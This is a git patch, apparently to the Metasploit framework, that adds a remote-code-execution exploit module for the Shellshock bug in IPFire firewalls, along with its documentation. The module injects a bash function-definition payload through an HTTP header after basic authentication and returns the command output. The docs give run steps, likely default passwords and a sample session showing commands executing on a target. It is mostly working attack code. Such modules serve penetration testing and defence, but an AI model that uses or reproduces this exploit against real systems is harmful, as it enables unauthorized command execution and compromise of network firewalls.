From df55f9a57c409d737ad0439e9cf3fc32cd9a328e Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 29 May 2016 20:40:12 -0400 Subject: [PATCH] first add of ipfire shellshock --- .../exploit/linux/http/ipfire_bashbug_exec.md | 47 ++++++++ .../linux/http/ipfire_bashbug_exec.rb | 113 ++++++++++++++++++ 2 files changed, 160 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md create mode 100644 modules/exploits/linux/http/ipfire_bashbug_exec.rb diff --git a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md new file mode 100644 index 0000000000..d0559b47be --- /dev/null +++ b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md @@ -0,0 +1,47 @@ +The following is the recommended format for module documentation. +But feel free to add more content/sections to this. + + +## Vulnerable Application + + Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso) + Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts) + +## Verification Steps + + Example steps in this format: + + 1. Install the firewall + 2. Start msfconsole + 3. Do: ```use exploit/linux/http/ipfire_bashbug_exec``` + 4. Do: ```set rhost 10.10.10.10``` + 5. Do: ```set CMD ls``` + 6. Do: ```run``` + 7. You should see the output of the command that was run. + +## Options + + **PASSWORD** + + Password is set at install. May be blank, 'admin', or 'ipfire'. + + **CMD** + + This is the command to run on the system. + +## Scenarios + + Example of running the ID command + ``` + msf > use exploit/linux/http/ipfire_bashbug_exec + msf exploit(ipfire_bashbug_exec) > set PASSWORD admin + PASSWORD => admin + msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202 + rhost => 192.168.2.202 + msf exploit(ipfire_bashbug_exec) > set CMD id + CMD => id + msf exploit(ipfire_bashbug_exec) > exploit + + [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody) + [*] Exploit completed, but no session was created. + ``` diff --git a/modules/exploits/linux/http/ipfire_bashbug_exec.rb b/modules/exploits/linux/http/ipfire_bashbug_exec.rb new file mode 100644 index 0000000000..bd08955fcb --- /dev/null +++ b/modules/exploits/linux/http/ipfire_bashbug_exec.rb @@ -0,0 +1,113 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)', + 'Description' => %q{ + IPFire, a free linux based open source firewall distribution, + version <= 2.15 Update Core 82 contains an authenticated remote + command execution vulnerability via shellshock in the request headers. + }, + 'Author' => + [ + 'h00die ', # module + 'Claudio Viviani' # discovery + ], + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ], + [ 'CVE', 'CVE-2014-6271'] + ], + 'License' => MSF_LICENSE, + 'Platform' => %w{ linux unix }, + 'Privileged' => false, + 'DefaultOptions' => + { + 'SSL' => true, + 'PAYLOAD' => 'cmd/unix/generic' + }, + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic' + } + }, + 'Targets' => + [ + [ 'Automatic Target', { }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 29 2014' + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']), + Opt::RPORT(444) + ], self.class) + end + + def check() + begin + res = send_request_cgi({ + 'uri' => '/cgi-bin/index.cgi', + 'method' => 'GET', + 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']), + }) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401 + /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body + + if version && update && version == "2.15" && update.to_i < 83 + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + # + # CVE-2014-6271 + # + def cve_2014_6271(cmd) + %{() { :;}; /bin/bash -c "#{cmd}" } + end + + def exploit() + begin + payload = cve_2014_6271(datastore['CMD']) + vprint_status("Exploiting with payload: #{payload}" ) + res = send_request_cgi({ + 'uri' => '/cgi-bin/index.cgi', + 'method' => 'GET', + 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']), + 'headers' => {'VULN' => payload} + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401 + /
  • Device: \/dev\/(?.+) reports/m =~ res.body + if output + print_good(output) + end + + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end